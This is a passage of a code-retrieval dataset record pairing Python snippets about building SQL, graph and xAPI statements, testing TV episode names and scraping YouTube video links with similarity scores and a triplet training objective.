"def _assemble(self):\n selectop = self._headopt and f'{self._headopt}' or ''\n select = f'{selectop} ' + ', '.join(self._head)\n froms = 'from ' + ', '.join(self._tables)\n joins = ' '.join(self._joins)\n wheres, wkw = self._build_where()\n\n order = ''\n if self._order:\n order = f'order by {self._order[0]} {self._order[1]}'\n limit = ''\n if self._limit:\n limit = f'limit {self._limit}'\n\n kw = self._kw.copy()\n kw.update(wkw)\n return (f'select {select} '\n f'{froms} '\n f'{joins} '\n f'{wheres} '\n f'{order} '\n f'{limit}'\n ), kw",
"def run_query(self, query: str) -> BoltStatementResult:\n with self.neo4j_driver.driver.session() as session:\n return session.run(query)",
"def to_sql(self):\n return self._grammar.compile_select(self)",
"def to_sql(self):\n\n if not self._action:\n self.set_action(\"select\")\n for scope in self._global_scopes.get(self.owner, {}).get(self._action, []):\n if not scope:\n continue\n\n scope(self.owner, self)\n\n grammar = self.get_grammar()\n sql = grammar.compile(self._action).to_sql()\n self.boot()\n return sql",
"def generate_select_sql(self, condition, fields):\n return \"SELECT %s FROM %s WHERE %s\" % (fields, self.tablename, condition)",
"def generate_sql(opts):\n base_select = BASE_SELECT[opts[\"source\"]]\n usage_structs = \",\".join(u.sql for u in USAGE_CRITERIA[opts[\"source\"]])\n usage_structs = indent(dedent(usage_structs), \" \")\n return TEMPLATE.format(**locals(), **opts)",
"def generate_dry_run_query(self) -> str:\n return self.connector.dry_run_query(self.traversal_node)",
"def construct_query(self):\n reader = QueryReader(filepath=self.filepath, filename=self.filename, raw_sql=self.raw_sql, params=self.params)\n return reader.sql",
"def _generate_stmt(self, n, add_indent=False):\n typ = type(n)\n if add_indent: self.indent_level += 2\n indent = self._make_indent()\n if add_indent: self.indent_level -= 2\n\n if typ in (\n c_ast.Decl, c_ast.Assignment, c_ast.Cast, c_ast.UnaryOp,\n c_ast.BinaryOp, c_ast.TernaryOp, c_ast.FuncCall, c_ast.ArrayRef,\n c_ast.StructRef, c_ast.Constant, c_ast.ID, c_ast.Typedef,\n c_ast.ExprList):\n # These can also appear in an expression context so no semicolon\n # is added to them automatically\n #\n # Only print out expression if they are part of slice\n if n.sliced:\n return indent + self.visit(n) + ';\\n'\n else:\n return indent + '{}\\n'\n elif typ in (c_ast.Compound,):\n # No extra indentation required before the opening brace of a\n # compound - because it consists of multiple lines it has to\n # compute its own indentation.\n #\n return self.visit(n)\n else:\n if n.sliced:\n return indent + self.visit(n) + '\\n'\n else:\n return ''",
"def sql(self):\n return ';\\n'.join([x.sql() for x in self._statements]) + ';'",
"def wrapGraph(self, query) :\n\t\tif self.graph :\n\t\t\treturn \" GRAPH <%s> { %s } \" % (self.graph, query)\n\t\telse :\n\t\t\treturn query",
"def construct_statement(*args):\n\n INPUT_STATEMENT = \"\"\n for statement in args:\n INPUT_STATEMENT += statement\n \n\n return INPUT_STATEMENT",
"def _select_query(self):\r\n if self._where:\r\n self._validate_select_where()\r\n return SelectStatement(\r\n self.column_family_name,\r\n fields=self._select_fields(),\r\n where=self._where,\r\n order_by=self._order,\r\n limit=self._limit,\r\n allow_filtering=self._allow_filtering\r\n )",
"def create_path_query(path, action, start=None):\n supported_actions = ['MATCH', 'CREATE UNIQUE']\n if action.upper() in supported_actions:\n if not start:\n query = 'START r=node:root(root_name = \"ndn\")\\n' +\\\n '%s (r)' % action.upper()\n else:\n query = 'START s=node(%s)\\n' % start + \\\n '%s (s)' % action.upper()\n else:\n raise UnsupportedQueryException(\"unsupported query\")\n\n assert(len(path) % 2 == 0)\n path_len = len(path) / 2\n items = ['-[%s]->(%s)'] * path_len\n query += ''.join(items)\n query = query % tuple(path)\n query += ' \\nRETURN (%s)' % path[-1].split(':')[0]\n\n return query",
"def query(\n self,\n statement, # type: str\n *options, # type: QueryOptions\n **kwargs # type: Any\n ) -> QueryResult:\n\n query = N1QLQuery.create_query_object(statement,\n *options,\n **kwargs)\n return QueryResult(N1QLRequest.generate_n1ql_request(self.connection,\n query.params,\n default_serializer=self.default_serializer))",
"def determine_query():\n return query if query is not None \\\n else f\"SELECT * FROM '{table}';\"",
"def _build_statement(self, document, statement, homepage, user=None, user_id=None):\n\n if re.match(r\"^http(s?):\\/\\/.*\", homepage) is None:\n homepage = f\"http://{homepage}\"\n\n statement = self.build_common_statement_properties(\n statement, homepage, user=user, user_id=user_id\n )\n\n statement[\"context\"].update(\n {\"contextActivities\": {\"category\": [{\"id\": \"https://w3id.org/xapi/lms\"}]}}\n )\n\n statement[\"object\"] = {\n \"definition\": {\n \"type\": \"http://id.tincanapi.com/activitytype/document\",\n \"name\": {self.get_locale(): document.title},\n },\n \"id\": f\"uuid://{document.id}\",\n \"objectType\": \"Activity\",\n }\n\n return statement",
"def build_query_clauses(\n where: str = \"\", order: str = \"\", limit: int = 0, offset: int = 0\n ) -> str:\n return SqliteQueryBuilder.build_query_clauses(where, order, limit, offset)",
"def _build_statement(self, video, statement, homepage, user=None, user_id=None):\n if re.match(r\"^http(s?):\\/\\/.*\", homepage) is None:\n homepage = f\"http://{homepage}\"\n\n statement = self.build_common_statement_properties(\n statement, homepage, user=user, user_id=user_id\n )\n\n category_id = (\n \"https://w3id.org/xapi/lms\"\n if statement[\"verb\"][\"id\"] == \"http://id.tincanapi.com/verb/downloaded\"\n else \"https://w3id.org/xapi/video\"\n )\n\n statement[\"context\"].update(\n {\"contextActivities\": {\"category\": [{\"id\": category_id}]}}\n )\n\n statement[\"object\"] = {\n \"definition\": {\n \"type\": self._get_activity_type(video),\n \"name\": {self.get_locale(): video.title},\n },\n \"id\": f\"uuid://{video.id}\",\n \"objectType\": \"Activity\",\n }\n\n return statement",
"def generate_graph(self):\n\t\tif self.joins == None:\n\t\t\tself.get_joins()\n\t\tprint('generating Networkx DiGraph object of {database} from query results'.format(**self.__dict__))\n\t\t# save distinct Child column values\n\t\tchilds = set([j.Child for j in self.joins])\n\t\t# save distinct Parent column values\n\t\tparents = set([j.Parent for j in self.joins])\n\t\t# save names of Leaf tables\n\t\tleafs = list(childs - parents)\n\t\tself._traverse_joins(leafs)"
] |
[
"0.62883943",
"0.62373525",
"0.6127089",
"0.6076715",
"0.6021788",
"0.5899546",
"0.5822399",
"0.57811886",
"0.5771908",
"0.5636946",
"0.55983907",
"0.5518773",
"0.5502564",
"0.54580635",
"0.53780705",
"0.5359265",
"0.53343433",
"0.5326838",
"0.5302847",
"0.5282023",
"0.52680576",
"0.5252042",
"0.5251066",
"0.5168782",
"0.51577866",
"0.5135911",
"0.51310426",
"0.5127428",
"0.5116321",
"0.5108794"
] |
0.6857161
|
0
|
test the episode name of each of the cases
|
def testGetEpisodeName(self):
for case in self.testCases:
assert case['title'] == getEpisodeName( case['show'], case['season'], case['episode'])
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_get_episode_overview(self):\n self.assertEquals(\n self.t['Battlestar Galactica (2003)'][1][6]['overview'].startswith(\n 'When a new copy of Doral, a Cylon who had been previously'),\n True\n )",
"def test_title(names):",
"def test_different_case(self):\n self.assertEquals(self.t['scrubs'][1][4]['episodename'], 'My Old Lady')\n self.assertEquals(self.t['sCruBs']['seriesname'], 'Scrubs')",
"def test_search_checkname(self):\n self.assertEquals(self.t['Scrubs'].search('my first')[0]['episodename'], 'My First Day')\n self.assertEquals(self.t['My Name Is Earl'].search('Faked His Own Death')[0]['episodename'], 'Faked His Own Death')",
"def test_season_iter(self):\n self.assertEquals(\n len(\n [episode for episode in self.t['Life on Mars'][1]]\n ),\n 8\n )",
"def test_episode_data(self):\n self.assertEquals(\n self.t['lost']['firstaired'],\n '2004-09-22'\n )",
"def test_excalibur_name():\n assert I07Nexus.excalibur_detector_2021 == \"excroi\"\n assert I07Nexus.excalibur_04_2022 == \"exr\"",
"def parse_anime_episode_title(filename):\n print_info('Attempting to parse episode title from {0}'.format(filename))\n for regex in ANIME_EPISODE_TITLE_REGEXS:\n m = re.search(regex, filename)\n\n if m is None:\n continue\n\n extracted_title = m.group('EpisodeTitle')\n return clean_episode_title(extracted_title)\n return ''",
"def test_download_specific_episode(self):\n episode = self._get_episode()\n torrent_filename = self.fetcher.download_specific_episode(episode)\n self.assertEqual(torrent_filename, FILENAME_2)",
"def parse_episode(filename):\n print_info('Extracting episode from {0}'.format(filename))\n for regex in EPISODE_NUM_REGEXS:\n m = re.search(regex, filename)\n\n if m is None:\n continue\n\n extracted_ep = m.group('Episode').lower()\n print_info('Extracted episode: {0}'.format(extracted_ep))\n\n if '-' in extracted_ep:\n print_info('Multiple Episodes found')\n tokens = extracted_ep.split('-e')\n first_token = tokens[0]\n last_token = tokens[len(tokens)-1]\n return parse_episode(first_token) + '-' + parse_episode(last_token)\n else:\n ep_num = int(extracted_ep)\n if ep_num is not None and ep_num > 0:\n print_info('Episode might be: {0}'.format(ep_num))\n return 'E' + format_num(ep_num)\n\n return None",
"def executeEpisode(self):\n trainExamples = []\n board = self.game.getInitBoard()\n player = 1\n episodeStep = 0\n\n while True:\n episodeStep += 1\n canonicalBoard = self.game.getCanonicalForm(board, player)\n temp = int(episodeStep < self.args.tempThreshold)\n\n pi = self.mcts.getActionProb(canonicalBoard, temp=temp)\n sym = self.game.getSymmetries(canonicalBoard, pi)\n for b, p in sym:\n trainExamples.append([b, player, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n board, player = self.game.getNextState(board, player, action)\n\n r = self.game.getGameEnded(board, player)\n\n if r != 0:\n ex = [(x[0], x[2], r * ((-1) ** (x[1] != player))) for x in trainExamples]\n return ex",
"def search_season_episode(self,strz):\t\n\t\tpattern = compile(\"(S(\\d\\d)E(\\d\\d))\") #S01E03\n\t\tsep = pattern.search(strz)\t\t\n\t\tif sep is not None:\n\t\t\tse= sep.group(1)\n\t\t\tseason = sep.group(2)\n\t\t\tepisode = sep.group(3)\n\t\t\treturn strz.replace(se,\"\")\n\t\t\t\n\t\tpattern = compile(\"((\\d\\d)x(\\d\\d))\") #01x03\n\t\tsep = pattern.search(strz)\t\t\n\t\tif sep is not None:\n\t\t\tse= sep.group(1)\n\t\t\tseason = sep.group(2)\n\t\t\tepisode = sep.group(3)\n\t\t\treturn strz.replace(se,\"\")\n\t\t\t\n\t\tpattern = compile(\"(Ep(\\d\\d))\") #Ep03\n\t\tsep = pattern.search(strz)\t\t\n\t\tif sep is not None:\n\t\t\tse= sep.group(1)\n\t\t\tepisode = sep.group(2)\n\t\t\treturn strz.replace(se,\"\")",
"def parse_episode_title(filename):\n print_info('Attempting to parse episode title from {0}'.format(filename))\n for regex in EPISODE_TITLE_REGEX:\n m = re.search(regex, filename)\n\n if m is None:\n continue\n\n extracted_title = m.group('EpisodeTitle')\n return clean_episode_title(extracted_title)\n return ''",
"def testOneShow(self):\n\t\t# for line in self.file:\n\t\t# \tprint line\n\t\tline = self.file.readline()\n\t\tinfo = scrapeFilename( line )\n\t\tassert info['show'] == \"Chuck\"",
"def check_for_season_episode_code(s):\n se_pattern = r'[sS](\\d{1,2})[eE](\\d{1,2})'\n\n m = re.search(se_pattern, s)\n\n if not m:\n return False\n\n return m",
"def test_legal_names(self):\n adjectives = ['Awesome', 'Shiny', 'Impressive', 'Portable', 'Improved']\n nouns = ['Anvil', 'Catapult' 'Disguise' 'Mousetrap', '???']\n products = acme_report.generate_products()\n for prod in range(len(products)):\n prod_name = products[prod].name\n name_split = prod_name.split()\n self.assertIn(name_split[0], adjectives)\n self.assertIn(name_split[1], nouns)",
"def matches(self: object, filename: str) -> bool:\n # Filename is equal to episode string representation\n if str(self) == filename:\n return True\n\n # Check leading episode number => download marked as special episode manually\n filename_match: Match[str] = re.search(r\"(^[0-9]{4} )\", filename)\n if filename_match:\n filename_id: int = int(filename_match.group(1))\n return self.episode_id == filename_id\n\n # Check for download of dailymotion\n filename_match: Match[str] = re.search(r\"(_E([0-9]{3,4})_)\", filename)\n if filename_match:\n filename_id: int = int(filename_match.group(2))\n return self.episode_id == filename_id\n\n # Check episode prefix with number => alredy handled by TaRen\n filename_match: Match[str] = re.search(r\"^(Tatort - ([0-9]{4}) )\", filename)\n if filename_match:\n filename_id: int = int(filename_match.group(2))\n return self.episode_id == filename_id\n\n # Last check => Is episode name part of filename\n return self.episode_name.lower() in filename.lower()",
"def test_interaction_accepts_name():\n demag = ThinFilmDemag()\n assert hasattr(demag, 'name')",
"def test_from_name(self, testdata: TestData) -> None:\n for record in testdata['observation_type']:\n assert ObservationType.from_name(record['name']).name == record['name']",
"def test_seasons(self):\n response = Tmdb.season(tmdb_show_id = 69740, season_number = 1)\n self.assertTrue(int(response.status_code) == 200)\n data = response.json()\n self.assertTrue(isinstance(data['episodes'], list))\n # TODO check if all the shows are in the good format (can be from_dict/to_dict)",
"def test_animals_can_speak(self):\n self.assertEqual(self.lion, 'roar')\n self.assertEqual(self.cat, 'meow')",
"def parse_anime_episode(filename):\n print_info('Extracting episode from {0}'.format(filename))\n for regex in ANIME_EPISODE_NUM_REGEXS:\n m = re.search(regex, filename)\n\n if m is None:\n continue\n\n extracted_ep = m.group('Episode')\n print_info('Extracted episode: {0}'.format(extracted_ep))\n\n ep_num = int(extracted_ep)\n if ep_num is not None and ep_num > 0:\n print_info('Episode might be: {0}'.format(ep_num))\n return 'E' + format_num(ep_num)\n\n return None",
"def test__parse_activity_name():\n for input_data, expected_output in (\n ({}, None),\n ({'game': None}, None),\n ({'game': {}}, None),\n ({'game': {'name': None}}, None),\n ({'game': {'name': ''}}, None),\n ({'game': {'name': 'a'}}, 'a'),\n ):\n output = parse_activity_name(input_data)\n vampytest.assert_eq(output, expected_output)",
"def testName(self):\n dis_meta = DiseaseMeta()\n\n self.util.stringTypeTest(self, dis_meta, \"name\")\n\n self.util.stringPropertyTest(self, dis_meta, \"name\")",
"def test_selecting_only_audio_episodes(\n only_audio_episodes: List[LepEpisode],\n) -> None:\n assert len(only_audio_episodes) == 14 # Without duplicates",
"def test_name_returner(self):\n test = self.data.name_returner()\n self.assertIn(('Trevor', 'Harvey'), test)\n self.assertIn(('Nik', 'Silver'), test)",
"def check_season_bounds(next_episode, show_details):\n pass",
"def _episode_matches(self, study_id: str, session_id: str, episode_id: str):\n return ((self._episodes.c.StudyId == study_id)\n & (self._episodes.c.SessionId == session_id)\n & (self._episodes.c.EpisodeId == episode_id))",
"def test_one_disemvowel_code_wars():\n from disemvowel_trolls import disemvowel\n tests = [(\"This website is for losers LOL!\", \"Ths wbst s fr lsrs LL!\"),\n (\"No offense but,\\nYour writing is among the worst I've everread\",\n \"N ffns bt,\\nYr wrtng s mng th wrst 'v vrrd\"),\n (\"What are you, a communist?\", \"Wht r y, cmmnst?\")]\n\n for case in tests:\n assert disemvowel(case[0]) == case[1]",
"def test_repr_episode(self):\n self.assertEquals(\n repr(self.t['CNNNN'][1][1]),\n \"<Episode 01x01 - September 19, 2002 (20:30 - 21:00)>\"\n )"
] |
[
"0.64243835",
"0.6258172",
"0.6202211",
"0.59608656",
"0.59162605",
"0.5914089",
"0.580214",
"0.5769495",
"0.57401305",
"0.5728818",
"0.56901574",
"0.5687813",
"0.56416893",
"0.5636315",
"0.5620725",
"0.5576326",
"0.5573055",
"0.55627346",
"0.5557772",
"0.5534065",
"0.5523661",
"0.5500905",
"0.5497799",
"0.5489746",
"0.5480026",
"0.5476657",
"0.54428416",
"0.5417085",
"0.5398167",
"0.53924"
] |
0.8190277
|
0
|
Collect links for videos related to self.keyword
|
def video_link_collector(self, count):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_individual_video_link(self):\r\n self.filter_url_portion = '' # ignore the filter option.\r\n\r\n target_search_results_obj = []\r\n # in case we want to search more pages just change this and make a loop\r\n self.page_url_portion = '&page=1'\r\n\r\n # start with forming the search\r\n self.form_search_url()\r\n\r\n # Get the dom object from the search page\r\n search_result_dom = self.get_dom_object(self.target_yt_search_url_str)\r\n\r\n # Get the search results\r\n target_search_results_obj.extend(self.tag_element_results(search_result_dom,\r\n 'div[class=\"yt-lockup-content\"] h3[class=\"yt-lockup-title\"] a'))\r\n\r\n #print 'results len: ', len(target_search_results_obj)\r\n\r\n each_video_link_title_dict = {}\r\n for n in target_search_results_obj:\r\n video_link = n.attributes['href']\r\n ## modified video link\r\n # video_link = re.sub('watch\\?v=',r'v/',video_link)\r\n\r\n video_title = n.attributes['title'] #\"Mix\" in video_title[:4] or \"mix\" i(n video_title[:4] or\r\n ile = video_title.lower()\r\n if \"cover\" in ile or \"live\" in ile or \"acustic\" in ile or \"acoustic\" in ile or \"lesson\" in ile:\r\n print \"found blacklisted term, bypassing song: \" + ile\r\n pass #dont want these\r\n else:\r\n each_video_link_title_dict[video_title] = 'https://www.youtube.com' + video_link\r\n\r\n self.video_link_title_dict.update(each_video_link_title_dict)",
"def search_videos(self, search_term):\n print(\"search_videos needs implementation\")",
"def get_keywords_for_movie(url):\n pass",
"def search_videos_tag(self, video_tag):\n print(\"search_videos_tag needs implementation\")",
"def get_links_filter(self, keyword, number_links):\r\n podcast_data = []\r\n\r\n for entry in self.rss[0].entries:\r\n if keyword in entry.title: \r\n try:\r\n podcast_data = [entry.published, entry.title, \r\n entry.enclosures[0]['href'], \r\n self.rss[0].feed.title\r\n ]\r\n except IOError as err:\r\n print err\r\n except UnicodeDecodeError as err:\r\n print err\r\n else:\r\n self.podcast_list.append(podcast_data)\r\n if number_links != 0:\r\n if len(self.podcast_list) == number_links: \r\n return None\r\n return None",
"def subtitle_search_engines_links(search, deep=0, debug=0, links=[]):\n s = Subseek()\n for subtitle_search_engine in SUBTITLE_SEARCH_ENGINES:\n if debug == 1:\n print \"Searching '%s' in '%s'\" % (search,\n subtitle_search_engine['name'])\n links_aux = s.get_links(subtitle_search_engine, search, deep)\n if not links_aux or len(links_aux) == 0:\n if debug == 1:\n print \"No match found in '%s'\" % subtitle_search_engine['name']\n else:\n if debug == 1:\n print \"%s matches found in '%s'\" % (len(links_aux),\n subtitle_search_engine['name'])\n\n links = links_aux + links\n\n return links",
"def search_videos(self, search_term):\n videos = self._video_library.get_all_videos()\n\n temp_list = []\n for vid in videos:\n\n # Convoluted way to display tags in required format\n tags = \"[\"\n for tag in vid.tags:\n tags = tags + tag + \" \"\n tags = tags + \"]\"\n print(f\"{vid.title}\")\n if tags != \"[]\":\n tags = tags[0:len(tags) - 2] + \"]\"\n if str(search_term.lower()) in str(vid.title):\n temp_list += [f\"{vid.title} ({vid.video_id}) {tags}\"]\n\n # Sort the list and display\n sorted_list = sorted(temp_list)\n print(f\"Here are the results for {search_term}:\")\n for x in sorted_list:\n print(\" \" + f\"{sorted_list.index(x) + 1}) \" + x)",
"def search_videos(self, search_term):\n results = []\n for video in self._video_library.get_all_videos():\n if search_term.lower() in video.title.lower() and video.flag is None:\n results.append(video)\n self.output_search_results(results, search_term)",
"def search_videos(self, search_term):\n videos = self._video_library.get_all_videos()\n videos.sort(key=lambda x: x.title, reverse=False)\n matched_id = []\n for v in videos:\n if search_term.lower() in v.title.lower():\n matched_id.append(v.video_id)\n \n if matched_id:\n i = 1\n print(f\"Here are the results for {search_term}:\")\n for id in matched_id:\n video = self._video_library.get_video(id)\n tags = str(video.tags)\n tags=tags.replace(\"'\",\"\")\n tags=tags.replace(\",\", \"\") \n tags=tags.replace(\")\", \"\") \n tags=tags.replace(\"(\", \"\") \n print(f\" {i}) {video.title} ({video.video_id}) [{tags}]\")\n\n i = i+1\n \n print(\"Would you like to play any of the above? If yes, \"\n \"specify the number of the video.\")\n print(\"If your answer is not a valid number, we will assume it's a no.\")\n option = input()\n # option = input(\"Would you like to play any of the above? If yes, \"\n # \"specify the number of the video. \\n If your answer is not a valid number, we will assume it's a no.\")\n\n try:\n value = int(option)\n if value > 1 and value < len(matched_id)+1 :\n self.play_video(matched_id[value-1])\n except ValueError:\n pass\n\n else:\n print(f\"No search results for {search_term}\")\n \n \n # print(\"search_videos needs implementation\")",
"def dirty_yt_search(keyword):\n yt_url = 'https://www.youtube.com/results'\n search_args = {'search_query': keyword}\n\n resp = requests.get(yt_url, search_args)\n print(resp.text)\n search_results = re.findall(r'href=\\\"\\/watch\\?v=(.{11})', resp.text)\n return 'http://www.youtube.com/watch?v=' + search_results[0]",
"def download_video_data(self):\n\n def scrape_url(url):\n \"\"\"Scrape the video list, youtube_dl does all the heavy lifting\"\"\"\n ydl_opts = {\n \"ignoreerrors\": True, # Skip private and unavaliable videos\n }\n\n ydl = youtube_dl.YoutubeDL(ydl_opts)\n\n with ydl:\n result_ydl = ydl.extract_info(\n url,\n download=False # No download needed, only the info\n )\n\n logger.debug('Url scraped {}', url)\n if 'entries' in result_ydl:\n # It's a playlist or a list of videos\n return result_ydl['entries']\n # Just a video\n return [result_ydl]\n\n youtube_list = sum((scrape_url(url) for url in self.youtube_lists), [])\n for youtube_video_data in youtube_list:\n if youtube_video_data: # Valid video\n self.youtube_videos.append(\n Video.from_youtube(\n video_data=youtube_video_data, event=self))\n else:\n logger.warning('Null youtube video')",
"def get_links(self: 'WebScraper', \n keyword: str\n ) -> Generator[req.Response, None, None]:\n print(f\"Collecting articles for the keyword '{keyword}'...\")\n \n # Create strainer that only searched for links with the corresponding \n # class specified in the constant LINKS_CLASS\n only_links = SoupStrainer(\n 'a', {'class': LINKS_CLASS}\n )\n parameters = {'q': keyword}\n \n # Iterate through the pages of the search\n for i in count(1):\n\n # Stop when the page limit has been reached\n if i > PAGE_LIMIT:\n return None\n \n # for keyword in keyword_synonyms:\n parameters['page'] = i\n res = self.get_request(SEARCH_URL, parameters)\n links = {\n link['href'] \n for link in BeautifulSoup(\n res.text, 'lxml', \n parse_only=only_links\n ).find_all('a', href=True) \n if self.verify(link['href'])\n }\n \n for link in links:\n this = self.get_request(link)\n if keyword.lower() in this.text.lower():\n yield this",
"def get_videos_urls(author):\n\tfoundAll = False\n\tind = 1\n\tvideos = []\n\twhile not foundAll:\n\t inp = urllib.urlopen(r'http://gdata.youtube.com/feeds/api/videos?start-index={0}&max-results=50&alt=json&orderby=published&author={1}'.format( ind, author ) )\n\t try:\n\t resp = json.load(inp)\n\t inp.close()\n\t returnedVideos = resp['feed']['entry']\n\t for video in returnedVideos:\n\t videos.append( video['link'][0]['href'] ) \n\n\t ind += 50\n\t if ( len( returnedVideos ) < 50 ):\n\t foundAll = True\n\t except:\n\t #catch the case where the number of videos in the channel is a multiple of 50\n\t print \"error\"\n\t foundAll = True\n\n\treturn videos",
"def external_search_engines_links(search, deep=0, debug=0, links=[]):\n s = Subseek()\n for search_engine in SEARCH_ENGINES:\n for subtitle_search_engine in SUBTITLE_SEARCH_ENGINES:\n if debug == 1:\n print \"Searching '%s' in '%s'\" % (search,\n search_engine['name'])\n links_aux = s.get_links(search_engine, search, deep,\n subtitle_search_engine[\"name\"])\n if not links_aux or len(links_aux) == 0:\n if debug == 1:\n print \"No match found in '%s'\" % search_engine['name']\n else:\n if debug == 1:\n print \"%s matches found in '%s'\" % (len(links_aux),\n search_engine['name'])\n links = links_aux + links\n\n return links",
"def get_videos_in_playlist(self):\n\n self.ydl = youtube_dl.YoutubeDL()\n # uses the youtube_dl as a context manager\n with self.ydl:\n self.result = self.ydl.extract_info(\n self.url, extra_info={'listformats': True}, download=False)\n for video in (self. result['entries']):\n video_id = video['id']\n self. url = f'https://www.youtube.com/watch?v={video_id}'\n self. show_formats()",
"def get_video_links(html):\n soup = BeautifulSoup(html, 'lxml')\n\n video_links = []\n video_titles = []\n playlist_items = soup.find_all('ytd-playlist-video-renderer')\n for playlist_item in playlist_items:\n\n # Get video link\n href = playlist_item.find('a')['href']\n video_link = 'https://www.youtube.com' + href.split('&')[0]\n video_links.append(video_link)\n\n # Get video title\n video_title = playlist_item.find('span',id='video-title')['title']\n video_titles.append(video_title)\n\n # Print list\n print('\\nLinks:')\n res = '\\n'.join(\"{} \\t {}\".format(x, y) for x, y in zip(video_titles, video_links))\n print(res)\n\n return video_links, video_titles",
"def download_all_videos(self, dl_limit=10):\r\n counter = dl_limit\r\n self.video_link_title_keylist = self.video_link_title_dict.keys()\r\n music = []\r\n for title in self.video_link_title_keylist:\r\n try:\r\n title = title.encode('ascii')\r\n # print 'downloading title with counter: ', counter\r\n if not counter:\r\n return random.choice(music) #some margin for randomness, first result isnt always accurate, (gets slower...)\r\n print 'downloading title: ', title\r\n\r\n self.add_result(\"Dowloaded_Song\", title)\r\n\r\n path = self.download_video(self.video_link_title_dict[title], title)\r\n music.append(path)\r\n counter = counter - 1\r\n except:\r\n print \"illegal characters in youtube name\" + title + \"\\n trying next result\"",
"def collect_webpages(self, keyword: str) -> Dict[str, List[req.Response]]:\n collected = {\n keyword: list(islice(\n takewhile(lambda x: x is not None, self.get_links(keyword)), \n 100\n ))\n }\n print(f\"Found {len(collected[keyword])} articles for the keyword \"\n f\"'{keyword}'.\")\n return collected",
"async def igvideo(self, ctx, url):\n response = requests.get(url.replace(\"`\", \"\"), headers={\"Accept-Encoding\": \"utf-8\"})\n tree = html.fromstring(response.content)\n results = tree.xpath('//meta[@content]')\n sources = []\n for result in results:\n try:\n if result.attrib['property'] == \"og:video\":\n sources.append(result.attrib['content'])\n except KeyError:\n pass\n if sources:\n await ctx.send(sources[0])\n self.logger.info(misolog.format_log(ctx, f\"Success\"))\n else:\n await ctx.send(\"Found nothing, sorry!\")\n self.logger.warning(misolog.format_log(ctx, f\"Found nothing\"))",
"async def video(ctx, message):\n \"\"\":param: ctx\"\"\"\n \"\"\":param: message\"\"\"\n \"\"\"return video url\"\"\"\n link_list = []\n print ('Searching YouTube for: %s' % message)\n url = \"https://www.youtube.com/results?search_query=\" + message\n response = urlopen(url)\n html = response.read()\n soup = BeautifulSoup(html, \"lxml\")\n for vid in soup.findAll(attrs={'class': 'yt-uix-tile-link'}):\n link_list.append('https://www.youtube.com' + vid['href'])\n if(len(link_list) >=1):\n random_num = random.randint(0, len(link_list) - 1)\n await bot.say(link_list[random_num])\n else:\n await bot.say(\"there is no contente for \"+message)",
"def _get_video_from_html(self, results_page, verbose=False):\n d = json.loads(results_page.text)\n for record in d['data']['records']:\n video_url = record['videoUrl']\n if verbose:\n print \"Video url: \" + video_url\n self._download_from_url(video_url)",
"def get_videos(url):\n videos = []\n if 'cinebix.com' in url:\n resolve_media(url,videos)\n return videos\n \n html = requests.get(url, headers=mozhdr).text\n mlink = SoupStrainer('div', {'class':re.compile('^singcont')})\n videoclass = BeautifulSoup(html, parseOnlyThese=mlink)\n try:\n links = videoclass.findAll('iframe')\n for link in links:\n url = link.get('src')\n resolve_media(url,videos)\n except:\n pass\n\n mlink = SoupStrainer('div', {'class':'entry-excerpt'})\n videoclass = BeautifulSoup(html, parseOnlyThese=mlink)\n try:\n links = videoclass.findAll('iframe')\n for link in links:\n if 'http' in str(link):\n url = link.get('src')\n resolve_media(url,videos)\n except:\n pass\n\n try:\n url = videoclass.p.a.get('href')\n resolve_media(url,videos)\n except:\n pass \n \n return videos",
"def search_videos(self, search_term):\n all_videos = self._video_library.get_all_videos()\n all_videos.sort(key=lambda x: x.title)\n matching_videos = []\n for video in all_videos:\n if search_term.lower() in video.title.lower():\n matching_videos.append(video)\n\n matching_videos.sort(key=lambda x: x.title)\n\n if len(matching_videos) == 0:\n print(f\"No search results for {search_term}\")\n return\n\n print(\"Here are the results for cat:\")\n for i, matching_video in enumerate(matching_videos):\n print(f\"{i + 1}) {str(matching_video)}\")\n\n print(\n \"Would you like to play any of the above? If yes, specify the number of the video.\\nIf your answer is not a valid number, we will assume it's a no.\")\n video_number = input()\n\n # print(video_number)\n\n try:\n int_video_number = int(video_number)\n if int_video_number > len(matching_videos) or int_video_number < 0:\n return\n else:\n self.play_video(matching_videos[int_video_number - 1].video_id)\n except ValueError:\n return",
"def get_videos(self, **kwargs):\n return self.get('videos', **kwargs)",
"def videos(self):\n return self._videos",
"def search_videos(self, search_term):\n recommendations = []\n for video in self.videos_dict:\n if not video.flagged and search_term in self.videos_dict[video]:\n recommendations.append(self.videos_dict[video])\n \n recommendations.sort()\n n = len(recommendations)\n\n\n if n == 0:\n print(f\"No search results for {search_term}\")\n else:\n print(f\"Here are the results for {search_term}:\")\n for i in range(n):\n print(f\"{i+1}) {recommendations[i]}\")\n print(\"Would you like to play any of the above? If yes, specify the number of the video.\")\n print(\"If your answer is not a valid number, we will assume it's a no.\")\n\n try:\n response = int(input())\n if response in range(1,n+1):\n wanted_video_info = recommendations[response-1]\n #print(wanted_video_info)\n s = wanted_video_info\n result = re.search(r\"\\(([A-Za-z0-9_]+)\\)\", s)\n #print(result.group(1))\n self.play_video(result.group(1))\n except ValueError:\n pass",
"async def video(self, ctx, *, arg: str):\n await ctx.send(site + self.extraire(search + self.traduire(arg.split(' ')), watch_))",
"def fetch_metadata_for_videos(category_url):\n soup = Soup(requests.get(category_url).content)\n for div in soup('div', attrs={'class': 'row-fluid section'}):\n title = div.findAll('a')[1].text\n description = div.findNext('div', attrs={'class':\n 'span7'}).findNext('p').text\n video_path = div.findNext('a')['href']\n video_url = 'http://pyvideo.org%s' % video_path\n yield title, description, video_url",
"def videos(self, videos):\n self._videos = videos",
"def get_links(file_src='index.html') -> List[Dict[str, str]]:\n with open(file_src) as file:\n soup = BS(file.read(), 'html.parser')\n\n vid_entries = soup.select('a.yt-simple-endpoint.style-scope.ytd-playlist-video-renderer')\n for vid_elem in vid_entries:\n song = vid_elem.select_one('span[title]')\n if song:\n title = song['title']\n href = vid_elem.select_one('a[href]')['href']\n yield {'title': title, 'href': href}"
] |
[
"0.7419088",
"0.6758847",
"0.6309692",
"0.6072542",
"0.6046429",
"0.6040589",
"0.60183644",
"0.60161775",
"0.5893839",
"0.58668417",
"0.58567715",
"0.58200836",
"0.5790145",
"0.57832175",
"0.5780403",
"0.5768532",
"0.5761548",
